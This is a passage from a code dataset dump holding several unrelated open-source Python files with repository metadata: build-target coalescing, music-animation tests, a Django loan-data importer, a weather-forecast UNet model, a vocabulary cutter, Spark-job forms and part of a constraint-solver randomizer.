the custom build xml to be conservative\n descriptors.append((current_type, [current_target]))\n start = current + 1\n if current < (len(coalesced) - 1):\n start_type = type(coalesced[start])\n\n elif start_type != current_type:\n # record the type chunk we just left\n descriptors.append((start_type, coalesced[start:current]))\n start = current\n start_type = current_type\n\n if start < len(coalesced):\n # record the tail chunk\n descriptors.append((start_type, coalesced[start:]))\n\n # build meta targets aggregated from the chunks and keep track of which targets end up in which\n # meta targets\n meta_targets_by_target_id = dict()\n targets_by_meta_target = []\n for (target_type, targets), index in zip(descriptors, reversed(range(0, len(descriptors)))):\n meta_target = create_target(target_type, meta_target_base_name, index, targets)\n targets_by_meta_target.append((meta_target, targets))\n for target in targets:\n meta_targets_by_target_id[target._id] = meta_target\n\n # calculate the other meta-targets (if any) each meta-target depends on\n 
extra_targets_by_meta_target = []\n for meta_target, targets in targets_by_meta_target:\n meta_deps = set()\n custom_antxml_path = None\n for target in targets:\n if target.custom_antxml_path:\n custom_antxml_path = target.custom_antxml_path\n for dep in target.resolved_dependencies:\n if is_jvm(dep):\n meta = meta_targets_by_target_id[dep._id]\n if meta != meta_target:\n meta_deps.add(meta)\n extra_targets_by_meta_target.append((meta_target, meta_deps, custom_antxml_path))\n\n def lift_excludes(meta_target):\n excludes = set()\n def lift(target):\n if target.excludes:\n excludes.update(target.excludes)\n for jar_dep in target.jar_dependencies:\n excludes.update(jar_dep.excludes)\n for internal_dep in target.internal_dependencies:\n lift(internal_dep)\n lift(meta_target)\n return excludes\n\n # link in the extra inter-meta deps\n meta_targets = []\n for meta_target, extra_deps, custom_antxml_path in extra_targets_by_meta_target:\n meta_targets.append(meta_target)\n meta_target.update_dependencies(extra_deps)\n meta_target.excludes = lift_excludes(meta_target)\n meta_target.custom_antxml_path = custom_antxml_path\n\n sorted_meta_targets = InternalTarget.sort_targets(meta_targets)\n def prune_metas(target):\n if sorted_meta_targets:\n try:\n sorted_meta_targets.remove(target)\n except ValueError:\n # we've already removed target in the current walk\n pass\n\n # link any disconnected meta_target graphs so we can return 1 root target\n root = None\n while sorted_meta_targets:\n new_root = sorted_meta_targets[0]\n new_root.walk(prune_metas, is_jvm)\n if root:\n new_root.update_dependencies([root])\n root = new_root\n\n return root\n","repo_name":"collude/collude","sub_path":"src/python/pants/ant/bang.py","file_name":"bang.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37700052791","text":"\"\"\"Misc tests for midani\n\"\"\"\nimport os\nimport sys\n\nfrom midani import midani_score\nfrom midani import midani_settings\nfrom midani import midani_time\n\nSCRIPT_PATH = os.path.dirname((os.path.realpath(__file__)))\n\n\ndef test_bg_beat_times():\n midi_fname = \"../sample_music/effrhy_2207.mid\"\n settings_kwargs = {\n \"midi_fname\": os.path.join(SCRIPT_PATH, midi_fname),\n \"bg_beat_times_length\": 2,\n }\n settings = midani_settings.Settings(**settings_kwargs)\n score = midani_score.read_score(settings)\n tempo_changes = midani_time.TempoChanges(score)\n assert (\n len(tempo_changes.t_changes_btimes) == 1\n ), \"len(tempo_changes.t_changes_btimes) != 1\"\n assert (\n tempo_changes.t_changes_btimes[0.0] == 120.0\n ), \"tempo_changes.t_changes_btimes[0.0] != 120.0\"\n settings.update_from_score(score, tempo_changes)\n assert settings.bg_clock_times == list(\n range(33)\n ), \"settings.bg_clock_times != list(range(33))\"\n settings_kwargs[\"bg_beat_times_length\"] = 2\n settings_kwargs[\"bg_beat_times\"] = [\n 1,\n ]\n settings = midani_settings.Settings(**settings_kwargs)\n score = midani_score.read_score(settings)\n tempo_changes = midani_time.TempoChanges(score)\n settings.update_from_score(score, tempo_changes)\n assert settings.bg_clock_times == [\n i + 0.5 for i in range(33)\n ], \"settings.bg_clock_times != [i + 0.5 for i in range(33)]\"\n\n\nif __name__ == \"__main__\":\n 
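extract_target above cuts a topologically sorted target list into runs of same-typed targets (additionally splitting a run at every target with a custom build xml). The run-splitting by itself is the classic itertools.groupby pattern, sketched here on plain values:

from itertools import groupby

# Hypothetical stand-ins for a topologically sorted list of build targets.
targets = ["java", "java", "scala", "scala", "scala", "java"]

chunks = [(kind, list(run)) for kind, run in groupby(targets)]
print(chunks)
# -> [('java', ['java', 'java']), ('scala', ['scala', 'scala', 'scala']), ('java', ['java'])]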
test_bg_beat_times()\n","repo_name":"malcolmsailor/midani","sub_path":"tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"631618669","text":"import pandas as pd\nfrom django.core.management.base import BaseCommand\n\nfrom sflp_portfolio.models.counterparty import Counterparty\nfrom sflp_portfolio.models.loan import Loan\nfrom sflp_portfolio.models.models import Portfolio\nfrom sflp_portfolio.models.models import PortfolioSnapshot\nfrom sflp_portfolio.models.property_collateral import PropertyCollateral\n\n\"\"\"\nNote: this is not a performant insertion of data, used for debugging data schemas / pipelines \n\n\"\"\"\n\n\nclass Command(BaseCommand):\n help = 'Imports Segmented Single Family Loan Performance data (Core Static Models)'\n\n # Clean up the database\n Portfolio.objects.all().delete()\n PortfolioSnapshot.objects.all().delete()\n Counterparty.objects.all().delete()\n Loan.objects.all().delete()\n PropertyCollateral.objects.all().delete()\n\n # Portfolio data\n portfolio_data = pd.read_csv(\"./sflp_portfolio/fixtures/portfolio.csv\", sep='|', index_col=None, low_memory=False,\n na_values=None,\n true_values=['Y'], false_values=['N'])\n\n portfolio_dict = {}\n for index, entry in portfolio_data.iterrows():\n portfolio, _ = Portfolio.objects.update_or_create(\n name=entry[0],\n description='Test SFLP Portfolio',\n )\n portfolio.save()\n portfolio_dict[entry[0]] = portfolio\n\n # Portfolio snapshot data\n portfolio_snapshot_data = pd.read_csv(\"./sflp_portfolio/fixtures/portfolio_snapshot.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n\n portfolio_snapshot_dict = {}\n for index, entry in portfolio_snapshot_data.iterrows():\n portfolio_snapshot, _ = PortfolioSnapshot.objects.update_or_create(\n monthly_reporting_period=entry[0],\n )\n portfolio_snapshot.save()\n portfolio_snapshot_dict[entry[0]] = portfolio_snapshot\n\n loan_data = pd.read_csv(\"./sflp_portfolio/fixtures/loan.csv\", sep='|', index_col=None, low_memory=False,\n na_values=None,\n true_values=['Y'], false_values=['N'])\n\n loan_data_list = []\n i = 0\n LOAN_COUNT = 10\n\n loan_dict = {}\n for index, entry in loan_data.iterrows():\n if (i < LOAN_COUNT):\n loan = Loan.objects.create(\n id=i,\n loan_identifier=entry[0],\n portfolio=portfolio_dict[entry[1]],\n # snapshot=portfolio_snapshot_dict[entry[2]],\n channel=entry[3],\n original_interest_rate=entry[4],\n original_upb=entry[5],\n original_loan_term=entry[6],\n origination_date=entry[7],\n first_payment_date=entry[8],\n original_loan_to_value_ratio=entry[9],\n loan_purpose=entry[10],\n amortization_type=entry[11],\n relocation_mortgage_indicator=entry[12],\n high_balance_loan_indicator=entry[13],\n mortgage_insurance_percentage=entry[14],\n mortgage_insurance_type=entry[15],\n original_combined_loan_to_value_ratio=entry[16],\n # prepayment_penalty_indicator=entry[17],\n # interest_only_loan_indicator=entry[18],\n )\n loan.save()\n loan_dict[entry[0]] = loan\n i += 1\n\n # Counterparty data\n counterparty_data = pd.read_csv(\"./sflp_portfolio/fixtures/counterparty.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n i = 0\n for index, entry in counterparty_data.iterrows():\n if i < LOAN_COUNT:\n counterparty = Counterparty.objects.create(\n id=i,\n loan_identifier=loan_dict[entry[0]], # loan FK reference\n 
counterparty_identifier=entry[0], # counterparty ID identical to loan ID\n number_of_borrowers=entry[1],\n debt_to_income=entry[2],\n borrower_credit_score_at_origination=entry[3],\n coborrower_credit_score_at_origination=entry[4],\n first_time_home_buyer_indicator=entry[5],\n )\n counterparty.save()\n i += 1\n\n # Property collateral data\n property_collateral_data = pd.read_csv(\"./sflp_portfolio/fixtures/property_collateral.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n\n i = 0\n for index, entry in property_collateral_data.iterrows():\n if i < LOAN_COUNT:\n property_collateral = PropertyCollateral.objects.create(\n id=i,\n loan_identifier=loan_dict[entry[0]], # loan FK reference\n property_type=entry[1],\n number_of_units=entry[2],\n occupancy_status=entry[3],\n property_state=entry[4],\n metropolitan_statistical_area=entry[5],\n zip_code_short=entry[6]\n )\n property_collateral.save()\n i += 1\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Successfully inserted Core SFLP data into db'))\n","repo_name":"open-risk/openNPL","sub_path":"sflp_portfolio/management/commands/load_static_sflp_csv.py","file_name":"load_static_sflp_csv.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"40393555163","text":"import numpy as np\n\nfrom torch import nn\nfrom torch.nn import functional as F\nimport pytorch_lightning as pl\nimport torch\n\nfrom benchmarks.validation_metrics import LeadTimeEval\nfrom benchmarks.unet import UNet\n\nclass FeaturesSysUNet(pl.LightningModule):\n def __init__(self, UNet_params: dict, extra_data: str, depth: int, height: int, \n width: int, len_seq_in: int, len_seq_out: int, bins_to_predict: int, \n seq_mode: str, **kwargs):\n super(FeaturesSysUNet, self).__init__()\n\n \n self.save_hyperparameters()\n self.model = UNet(**UNet_params)\n self.extra_data = extra_data\n self.depth = depth\n self.height = height\n self.width = width\n self.len_seq_in = len_seq_in\n self.len_seq_out = len_seq_out\n self.bins_to_predict = bins_to_predict\n self.seq_mode = seq_mode\n \n self.target_vars = kwargs['target_vars']\n self.main_metric = 'mse'\n \n self.leadTeval = LeadTimeEval(len_seq_in, bins_to_predict, len(self.target_vars))\n self.prec = 7\n\n loss = 'mse'\n self.loss_fn = {'smoothL1': nn.SmoothL1Loss(), 'L1': nn.L1Loss(), 'mse': F.mse_loss}\n self.loss_fn = self.loss_fn[loss]\n \n def on_fit_start(self):\n \"\"\" create a placeholder to save the results of the metric per variable \"\"\"\n metric_placeholder = { metric: -1 for metric in self.target_vars}\n metric_placeholder = {**metric_placeholder, **{self.main_metric: -1}}\n self.logger.log_hyperparams(self.hparams, metric_placeholder)\n \n def forward(self, x):\n return self.model(x)\n \n def _compute_loss(self, y_hat, y, agg=True):\n\n if agg:\n loss = self.loss_fn(y_hat, y)\n else:\n loss = self.loss_fn(y_hat, y, reduction='none')\n return loss\n \n def training_step(self, batch, batch_idx, phase='train'):\n\n x, y, *ignored = batch\n y_hat = self.forward(x)\n \n loss = self._compute_loss(y_hat, y)\n self.log(f'{phase}_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx, phase='val'):\n \n x, y, *ignored = batch\n y_hat = self.forward(x)\n\n loss = self._compute_loss(y_hat, y)\n return loss\n\n def validation_epoch_end(self, outputs, phase='val'):\n avg_loss = torch.stack([x for x in outputs]).mean()\n 
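The importer above saves rows one at a time inside iterrows, which its own note flags as non-performant. The usual Django remedy is to build the instances in memory and issue one bulk_create; a sketch reusing this module's names, with the field list abbreviated:

# Sketch only: batch the inserts instead of saving row by row
# (field list abbreviated; mirrors the names used in this module).
loans = []
for i, (index, entry) in enumerate(loan_data.iterrows()):
    if i >= LOAN_COUNT:
        break
    loans.append(Loan(
        id=i,
        loan_identifier=entry[0],
        portfolio=portfolio_dict[entry[1]],
        channel=entry[3],
    ))
Loan.objects.bulk_create(loans, batch_size=500)  # one round trip per batch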
self.log(f'{phase}_loss_epoch', avg_loss, prog_bar=True)\n self.log(self.main_metric, avg_loss)\n \n def test_step(self, batch, batch_idx, phase='test'):\n\n x, y, metadata = batch\n y_hat = self.forward(x)\n \n loss = self._compute_loss(y_hat, y, agg=False)\n self.log(f'{phase}_loss', loss.mean())\n \n # reduce spatial dims - keep batch & channels\n loss = loss.mean(dim=(-1, -2))#.detach().cpu().numpy()\n self.leadTeval.update_errors(loss.detach().cpu().numpy(), metadata)\n \n # reduce batch - keep channels\n loss = loss.mean(dim=(0)) \n return loss\n \n def test_epoch_end(self, outputs, phase='test'):\n # ------------\n # 1. Test Channels\n # ------------\n # concat batches and compute the mean among them preserving channels\n val_set_loss = torch.stack(outputs, dim=0)\n val_set_loss = val_set_loss.mean(dim=(0))\n val_set_loss = self.leadTeval.get_numpy(val_set_loss)\n \n # log metrics\n text = f'extra data: {self.extra_data} | '\n for i, channel in enumerate(self.target_vars):\n self.log(channel, val_set_loss[i])\n v = np.format_float_positional(val_set_loss[i], precision=self.prec)\n text += f'{channel}: {v} | '\n \n v = np.format_float_positional(val_set_loss.mean(), precision=self.prec)\n text += f'mse: {v}'\n print(text)\n self.log(self.main_metric, val_set_loss.mean())\n \n # ------------\n # 2. Test Lead Time\n # ------------\n #fname = f'{self.logger.log_dir}/lead_times_mse.csv'\n region_id = self.test_dataloader().dataset.region_id\n ers, std = self.leadTeval.get_lead_time_metrics(self.logger.log_dir, text, region_id)\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n \n","repo_name":"iarai/weather4cast","sub_path":"benchmarks/FeaturesSysUNet.py","file_name":"FeaturesSysUNet.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"44436958546","text":"# INPUT: -v full/vocab_full_[test/train/both].pkl (choose any full vocabulary)\n# -n (top n words based on frequency that we will keep)\n\n# OUTPUT: cut/cut-vocab-frequency.pkl\n# TYPE: list(tuple)<(word, frequency)>\n\nimport pickle\nfrom argparse import ArgumentParser\nimport constants\nimport os\n\nparser = ArgumentParser()\nparser.add_argument(\"-v\", choices=[\"test\", \"train-short\", \"train-full\", \"test-and-train-short\", \"test-and-train-full\",\n \"nodup-test-and-train-full\"])\nparser.add_argument(\"-n\", type=int)\nargs = parser.parse_args()\n\nwith open(os.path.join(constants.VOCABULARIES_FULL_PATH, f\"{args.v}.pkl\"), \"rb\") as inputfile:\n full_vocab = pickle.load(inputfile)\n\n# Select the n most frequent words.\nfull_vocab.sort(key=lambda p: p[1], reverse=True)\ncut_vocab = [word for (word, count) in full_vocab[:args.n]]\n\nwith open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"cut-vocab-{args.v}-{args.n}-most-frequent.pkl\"), \"wb\") as outputfile:\n pickle.dump(cut_vocab, outputfile)\n\nwith open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"cut-vocab-{args.v}-{args.n}-most-frequent.txt\"), \"w\") as outputfile:\n outputfile.write('\\n'.join(cut_vocab))\n","repo_name":"cmimprota/CSR","sub_path":"vocabularies/cuttings/cut_vocab_most_frequent.py","file_name":"cut_vocab_most_frequent.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3279496044","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 
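cut_vocab_most_frequent above sorts the entire vocabulary just to keep the n most frequent words; heapq.nlargest performs the same selection without a full sort. A drop-in sketch on toy data:

import heapq

full_vocab = [("the", 900), ("model", 412), ("data", 388), ("rare", 3)]
n = 2

# nlargest keeps only the top-n entries by frequency, in descending order.
cut_vocab = [word for word, count in heapq.nlargest(n, full_vocab, key=lambda p: p[1])]
print(cut_vocab)  # -> ['the', 'model']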
2.0. If a copy of the MPL was not distributed with this\n# file, you can obtain one at http://mozilla.org/MPL/2.0/.\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.utils import dateformat, timezone\nfrom django.utils.safestring import mark_safe\n\nfrom . import models\nfrom ..clusters.forms import EMRReleaseChoiceField\nfrom ..forms.fields import CachedFileField\nfrom ..forms.mixins import (AutoClassFormMixin, CachedFileModelFormMixin,\n CreatedByModelFormMixin)\n\n\nclass BaseSparkJobForm(AutoClassFormMixin, CachedFileModelFormMixin,\n CreatedByModelFormMixin, forms.ModelForm):\n \"\"\"\n A base form used for creating new jobs.\n \"\"\"\n identifier = forms.RegexField(\n required=True,\n label='Identifier',\n regex=r'^[a-z0-9-]{1,100}$',\n widget=forms.TextInput(attrs={\n 'pattern': r'[a-z0-9-]{1,100}',\n 'data-parsley-pattern-message': 'Identifier contains invalid characters.',\n }),\n help_text='A unique identifier for your Spark job, visible in '\n 'the AWS management console. (Lowercase, use hyphens '\n 'instead of spaces.)'\n )\n description = forms.CharField(\n required=True,\n label='Description',\n strip=True,\n widget=forms.Textarea(attrs={\n 'rows': 2,\n }),\n help_text=\"A brief description of your Spark job's purpose. \"\n \"This is intended to provide extra context for the \"\n \"data engineering team.\"\n )\n result_visibility = forms.ChoiceField(\n required=True,\n choices=models.SparkJob.RESULT_VISIBILITY_CHOICES,\n widget=forms.RadioSelect(attrs={\n 'class': 'radioset',\n }),\n label='Result visibility',\n help_text='Whether notebook results are uploaded to a public '\n 'or private S3 bucket.',\n )\n size = forms.IntegerField(\n required=True,\n min_value=1,\n max_value=settings.AWS_CONFIG['MAX_CLUSTER_SIZE'],\n label='Cluster size',\n widget=forms.NumberInput(attrs={\n 'min': '1',\n 'max': str(settings.AWS_CONFIG['MAX_CLUSTER_SIZE']),\n }),\n help_text='Number of workers to use when running the Spark job '\n '(1 is recommended for testing or development).'\n )\n interval_in_hours = forms.ChoiceField(\n required=True,\n choices=models.SparkJob.INTERVAL_CHOICES,\n widget=forms.RadioSelect(attrs={\n 'class': 'radioset',\n }),\n label='Run interval',\n help_text='Interval at which the Spark job should be run.',\n )\n job_timeout = forms.IntegerField(\n required=True,\n min_value=1,\n max_value=24,\n label='Timeout',\n widget=forms.NumberInput(attrs={\n 'min': '1',\n 'max': '24',\n }),\n help_text='Number of hours that a single run of the job can run '\n 'for before timing out and being terminated.'\n )\n start_date = forms.DateTimeField(\n required=True,\n widget=forms.DateTimeInput(attrs={\n 'class': 'datetimepicker',\n }),\n label='Start date',\n help_text='Date and time of when the scheduled Spark job should '\n 'start running.',\n )\n end_date = forms.DateTimeField(\n required=False,\n widget=forms.DateTimeInput(attrs={\n 'class': 'datetimepicker',\n }),\n label='End date',\n help_text='Date and time of when the scheduled Spark job should '\n 'stop running - leave this blank if the job should '\n 'not be disabled.',\n )\n notebook = CachedFileField(\n required=True,\n widget=forms.FileInput(attrs={\n 'accept': '.ipynb, .json',\n }),\n label='Analysis Jupyter/Zeppelin Notebook',\n help_text='A Jupyter (.ipynb) or Zeppelin (.json) Notebook.'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n now = dateformat.format(timezone.now(), settings.DATETIME_FORMAT)\n 
self.fields['start_date'].label = mark_safe(\n '%s (UTC) Currently: %s' %\n (self.fields['start_date'].label, now)\n )\n self.fields['end_date'].label = mark_safe(\n '%s (UTC) Currently: %s' %\n (self.fields['end_date'].label, now)\n )\n\n class Meta:\n model = models.SparkJob\n fields = [\n 'identifier', 'description', 'result_visibility', 'size',\n 'interval_in_hours', 'job_timeout', 'start_date', 'end_date'\n ]\n\n @property\n def field_order(self):\n \"\"\"\n Copy the defined model form fields and insert the\n notebook field at the second spot\n \"\"\"\n fields = self._meta.fields[:]\n fields.insert(2, 'notebook')\n return fields\n\n def clean_notebook(self):\n \"\"\"\n Validate the uploaded notebook file if it ends with the\n ipynb file extension.\n \"\"\"\n notebook_file = self.cleaned_data['notebook']\n if notebook_file and not notebook_file.name.endswith(('.ipynb', '.json')):\n raise forms.ValidationError('Only Jupyter/Zeppelin Notebooks are '\n 'allowed to be uploaded')\n return notebook_file\n\n def save(self, commit=True):\n \"\"\"\n Store the notebook file on S3 and save the Spark job details\n to the datebase.\n \"\"\"\n # create the model without committing, since we haven't\n # set the required created_by field yet\n spark_job = super().save(commit=False)\n # if notebook was specified, replace the current notebook\n if 'notebook' in self.changed_data:\n spark_job.notebook_s3_key = self.instance.provisioner.add(\n identifier=self.cleaned_data['identifier'],\n notebook_file=self.cleaned_data['notebook']\n )\n\n if commit: # pragma: no cover\n # actually save the scheduled Spark job, and return the model object\n spark_job.save()\n return spark_job\n\n\nclass NewSparkJobForm(BaseSparkJobForm):\n \"\"\"\n A :class:`~BaseSparkJobForm` subclass used for creating new jobs.\n \"\"\"\n prefix = 'new'\n emr_release = EMRReleaseChoiceField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['identifier'].widget.attrs.update({\n 'data-parsley-remote': (\n reverse('jobs-identifier-available') + '?identifier={value}'\n ),\n 'data-parsley-remote-reverse': 'true',\n 'data-parsley-remote-message': 'Identifier unavailable',\n 'data-parsley-debounce': '500',\n })\n\n class Meta(BaseSparkJobForm.Meta):\n fields = BaseSparkJobForm.Meta.fields + ['emr_release']\n\n\nclass EditSparkJobForm(BaseSparkJobForm):\n \"\"\"\n A :class:`~BaseSparkJobForm` subclass used for editing jobs.\n \"\"\"\n prefix = 'edit'\n notebook = CachedFileField(\n required=False,\n widget=forms.FileInput(attrs={'accept': '.ipynb, .json'}),\n label='Analysis Jupyter/Zeppelin Notebook',\n help_text='A Jupyter (.ipynb) or Zeppelin (.json) Notebook.',\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['identifier'].disabled = True\n self.fields['notebook'].help_text += (\n '
Current notebook: %s' % self.instance.notebook_name\n )\n self.fields['start_date'].help_text += (\n 'Changing this field will reset the job schedule. '\n 'Only future dates are allowed.'\n )\n\n def clean_start_date(self):\n if ('start_date' in self.changed_data and\n self.cleaned_data['start_date'] < timezone.now()):\n raise forms.ValidationError(\n 'You can only move the start date to a future date'\n )\n return self.cleaned_data['start_date']\n\n\nclass SparkJobAvailableForm(forms.Form):\n \"\"\"\n A form used in the views that checks for the availability of identifiers.\n \"\"\"\n identifier = forms.CharField(required=True)\n","repo_name":"rizplate/telemetry-analysis-service","sub_path":"atmo/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"26302382909","text":"import random\nimport sys\nimport time\nfrom typing import List, Dict\n\nfrom pyboolector import Boolector, BoolectorNode\nimport pyboolector\nfrom vsc.constraints import constraint, soft\nfrom vsc.model.bin_expr_type import BinExprType\nfrom vsc.model.constraint_model import ConstraintModel\nfrom vsc.model.constraint_soft_model import ConstraintSoftModel\nfrom vsc.model.expr_bin_model import ExprBinModel\nfrom vsc.model.expr_fieldref_model import ExprFieldRefModel\nfrom vsc.model.expr_literal_model import ExprLiteralModel\nfrom vsc.model.expr_model import ExprModel\nfrom vsc.model.field_model import FieldModel\nfrom vsc.model.field_scalar_model import FieldScalarModel\nfrom vsc.model.model_visitor import ModelVisitor\nfrom vsc.model.rand_if import RandIF\nfrom vsc.model.rand_info import RandInfo\nfrom vsc.model.rand_info_builder import RandInfoBuilder\nfrom vsc.model.variable_bound_model import VariableBoundModel\nfrom vsc.visitors.array_constraint_builder import ArrayConstraintBuilder\nfrom vsc.visitors.constraint_override_rollback_visitor import ConstraintOverrideRollbackVisitor\nfrom vsc.visitors.dist_constraint_builder import DistConstraintBuilder\nfrom vsc.visitors.model_pretty_printer import ModelPrettyPrinter\nfrom vsc.visitors.variable_bound_visitor import VariableBoundVisitor\nfrom vsc.visitors.dynamic_expr_reset_visitor import DynamicExprResetVisitor\nfrom vsc.model.solve_failure import SolveFailure\nfrom vsc.visitors.ref_fields_postrand_visitor import RefFieldsPostRandVisitor\nfrom vsc.model.rand_set_node_builder import RandSetNodeBuilder\nfrom vsc.model.rand_set_dispose_visitor import RandSetDisposeVisitor\nfrom vsc.visitors.clear_soft_priority_visitor import ClearSoftPriorityVisitor\nfrom vsc.profile import randomize_start, randomize_done, profile_on\nfrom vsc.model.source_info import SourceInfo\nfrom vsc.profile.solve_info import SolveInfo\nfrom vsc.visitors.lint_visitor import LintVisitor\nfrom pip._internal.cli.cmdoptions import src\nfrom vsc.model.solvegroup_swizzler_range import SolveGroupSwizzlerRange\nfrom vsc.model.solvegroup_swizzler_partsel import SolveGroupSwizzlerPartsel\nfrom vsc.impl.ctor import glbl_debug, glbl_solvefail_debug\n\n\nclass Randomizer(RandIF):\n \"\"\"Implements the core randomization algorithm\"\"\"\n \n EN_DEBUG = False\n \n def __init__(self, debug=0, lint=0, solve_fail_debug=0, solve_info=None):\n self.pretty_printer = ModelPrettyPrinter()\n self.solve_info = solve_info\n self.debug = debug\n if glbl_debug > 0 and glbl_debug > debug:\n self.debug = glbl_debug\n\n self.lint = lint\n self.solve_fail_debug = solve_fail_debug\n if glbl_solvefail_debug > 0 
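BaseSparkJobForm.save above relies on the commit=False idiom: build the model instance, attach the uploaded notebook's S3 key, and only then write it. The general shape of that pattern on a schematic form; the Report model and upload_to_s3 helper are hypothetical stand-ins, not this project's API:

from django import forms

class ReportForm(forms.ModelForm):          # schematic; Report is a hypothetical model
    class Meta:
        model = Report
        fields = ["title"]

    def save(self, commit=True):
        report = super().save(commit=False)  # build the instance, defer the INSERT
        report.s3_key = upload_to_s3(        # hypothetical side effect before saving
            self.cleaned_data["title"])
        if commit:
            report.save()
        return report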
and glbl_solvefail_debug > solve_fail_debug:\n self.solve_fail_debug = glbl_solvefail_debug\n \n# self.swizzler = SolveGroupSwizzlerRange(solve_info)\n self.swizzler = SolveGroupSwizzlerPartsel(solve_info)\n \n _state_p = [0,1]\n _rng = None\n \n def randomize(self, ri : RandInfo, bound_m : Dict[FieldModel,VariableBoundModel]):\n \"\"\"Randomize the variables and constraints in a RandInfo collection\"\"\"\n \n if self.solve_info is not None:\n self.solve_info.n_randsets = len(ri.randsets())\n \n if self.debug > 0:\n rs_i = 0\n while rs_i < len(ri.randsets()):\n rs = ri.randsets()[rs_i]\n print(\"RandSet[%d]\" % rs_i)\n for f in rs.all_fields():\n if f in bound_m.keys():\n print(\" Field: %s is_rand=%s %s\" % (f.fullname, str(f.is_used_rand), str(bound_m[f].domain.range_l)))\n else:\n print(\" Field: %s is_rand=%s (unbounded)\" % (f.fullname, str(f.is_used_rand)))\n \n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True))\n \n rs_i += 1\n \n for uf in ri.unconstrained():\n print(\"Unconstrained: \" + uf.fullname)\n \n # Assign values to the unconstrained fields first\n uc_rand = list(filter(lambda f:f.is_used_rand, ri.unconstrained()))\n for uf in uc_rand:\n if self.debug > 0:\n print(\"Randomizing unconstrained: \" + uf.fullname)\n bounds = bound_m[uf]\n range_l = bounds.domain.range_l\n \n if len(range_l) == 1:\n # Single (likely domain-based) range\n uf.set_val(\n self.randint(range_l[0][0], range_l[0][1]))\n else:\n # Most likely an enumerated type\n # TODO: are there any cases where these could be ranges?\n idx = self.randint(0, len(range_l)-1)\n uf.set_val(range_l[idx][0]) \n \n # Lock so we don't overwrite\n uf.set_used_rand(False)\n\n rs_i = 0\n start_rs_i = 0\n# max_fields = 20\n max_fields = 0\n while rs_i < len(ri.randsets()):\n btor = Boolector()\n self.btor = btor\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n \n start_rs_i = rs_i\n\n constraint_l = []\n soft_constraint_l = []\n \n # Collect up to max_fields fields to randomize at a time\n n_fields = 0\n while rs_i < len(ri.randsets()):\n rs = ri.randsets()[rs_i]\n \n rs_node_builder = RandSetNodeBuilder(btor)\n\n all_fields = rs.all_fields()\n if self.debug > 0:\n print(\"Pre-Randomize: RandSet[%d]\" % rs_i)\n for f in all_fields:\n if f in bound_m.keys():\n print(\" Field: %s is_rand=%s %s var=%s\" % (f.fullname, str(f.is_used_rand), str(bound_m[f].domain.range_l), str(f.var)))\n else:\n print(\" Field: %s is_rand=%s (unbounded)\" % (f.fullname, str(f.is_used_rand)))\n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n \n if self.solve_info is not None:\n self.solve_info.n_cfields += len(all_fields)\n\n rs_node_builder.build(rs)\n n_fields += len(all_fields)\n \n# constraint_l.extend(list(map(lambda c:(c,c.build(btor),isinstance(c,ConstraintSoftModel)), rs.constraints())))\n constraint_l.extend(list(map(lambda c:(c,c.build(btor)), rs.constraints())))\n soft_constraint_l.extend(list(map(lambda c:(c,c.build(btor)), rs.soft_constraints())))\n \n # Sort the list in descending order so we know which constraints\n # to prioritize\n soft_constraint_l.sort(key=lambda c:c[0].priority, reverse=True)\n \n rs_i += 
1\n if n_fields > max_fields or rs.order != -1:\n break\n \n for c in constraint_l:\n try:\n btor.Assume(c[1])\n except Exception as e:\n print(\"Exception: \" + self.pretty_printer.print(c[0]))\n raise e\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n \n if btor.Sat() != btor.SAT:\n # If the system doesn't solve with hard constraints added,\n # then we may as well bail now\n active_randsets = []\n for rs in ri.randsets():\n active_randsets.append(rs)\n for f in rs.all_fields():\n f.dispose()\n \n if self.solve_fail_debug > 0:\n raise SolveFailure(\n \"solve failure\",\n self.create_diagnostics(active_randsets))\n else:\n raise SolveFailure(\n \"solve failure\",\n \"Solve failure: set 'solve_fail_debug=1' for more details\")\n else:\n # Lock down the hard constraints that are confirmed\n # to be valid\n for c in constraint_l:\n btor.Assert(c[1])\n\n # If there are soft constraints, add these now\n if len(soft_constraint_l) > 0: \n for c in soft_constraint_l:\n try:\n btor.Assume(c[1])\n except 